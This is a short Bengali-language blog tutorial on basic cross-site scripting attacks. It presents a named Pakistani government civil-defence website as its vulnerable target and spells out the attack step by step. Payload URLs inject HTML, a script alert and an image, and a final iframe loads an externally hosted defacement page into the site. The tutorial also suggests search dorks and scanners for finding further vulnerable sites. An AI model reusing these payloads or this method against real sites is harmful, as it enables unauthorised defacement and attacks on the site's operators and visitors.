XSS ATTACK BASIC in Bangla বাংলায় XSS ATTACK এর টিউটোরিয়াল

সবাইকে সাগতম হ্যাক স্কুল বিডির টিউটোরিয়ালে।
আজকে আমি Xss Method ব্যাবহার করে কিভাবে ওয়েবসাইট এট্যাক করা যায় সেটা দেখানোর চেষ্টা করবো ।
XXS কি ?
Xss হচ্ছে এমন এক ধরনের সিকিউরিটি ভুলনরাবেলেটি যা ওয়েব এপ্লিকেশনের মধ্যে পাওয়া যায় । XSS ভুলনারাবেলেটি ব্যাবহার করে আমরা ভুলনরাবল স্ক্রিপ্ট RUN করাতে পারি ওয়েব এপ্লিক্যাশনে এই দুই ধরনের মেথড
ব্যাবহার করে। browser side, server side.
কথা না বাড়িয়ে কাজে চলে যায় । !  XSS vulnerable site বের করার জন্যে google dork ব্যাবহার করতে পারেন ।অথবা ভুলনরাবেলেটি স্ক্যানার Acunetix Net SPark
ইত্যাদি ব্যাবহার করতে পারনে ।
আমি আগে থেকেই একটি ওয়েবসাইট বের করে রেখেছি ।

vulnerable URL :

http://civildefence.gov.pk/dgcd2/g.php?dir=flood+relief&gallery_name=
প্রথমেই আমি একটি HTML ট্যাগ রান করে দেখায় ।
http://civildefence.gov.pk/dgcd2/g.php?dir=flood+relief&gallery_name=<h1> XSS ATTACK</h1>
আপনি ওয়েবসাইটের কন্টেন্টে XSS ATTACK লেখাটি দেখতে পাবেন ।
এবার একটি স্ক্রিপ্ট রান করিয়ে দেখা যাক!
<script>alert("XSS VULN")</script>
-
ওয়েবসাইটে কি দেখায় দেখি তাহলেঃ
http://civildefence.gov.pk/dgcd2/g.php?dir=flood+relief&gallery_name=<script>alert("XSS VULN")</script>
দেখতে পাবেন একটি বক্স ওপেন হচ্ছে যেটাতে লেখা XSS VULN.
যায় হোক এবার একটি ইমেজ এড করে দেখিঃ
http://civildefence.gov.pk/dgcd2/g.php?dir=flood+relief&gallery_name=<center><img

src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-fs-Ng9d-E9gQ2ee6fTCYzM0XbPRjpWg1GhbJjghonlQNBIvkOFSBA9-HeujoYSpFDbm1DvLpgG2PimpDTupMrxzsarpGkuKYCx48FSPNEl6EAivpvFnfU9niqaz3iBf8pvOnZ2KaXUy3/s1600/xss.jpg" hight=800

widht=1030> </center>
এখন ওয়েব কন্টেন্টে একটি ছবি দেখতে পাবেন !
-
এবার দেখি ডিফেস পেইজ কিভাবে এড করা যায় সেটাঃ
<iframe src="http://www.rpd.ie/xssd.html" height 768 width=1024>
-
http://civildefence.gov.pk/dgcd2/g.php?dir=flood+relief&gallery_name=%3Ciframe%20src=

%22http://www.rpd.ie/xssd.html%22%20height%20768%20width=1024%3E
-
এটা ছিলো বেসিক XSS ATTACK নিয়ে টিউটোরিয়াল। সামনের টিউটোরিয়ালে এডভান্স XSS ATTACK নিয়ে লেখার ইচ্ছে আছি :)
ধন্যবাদ!!!!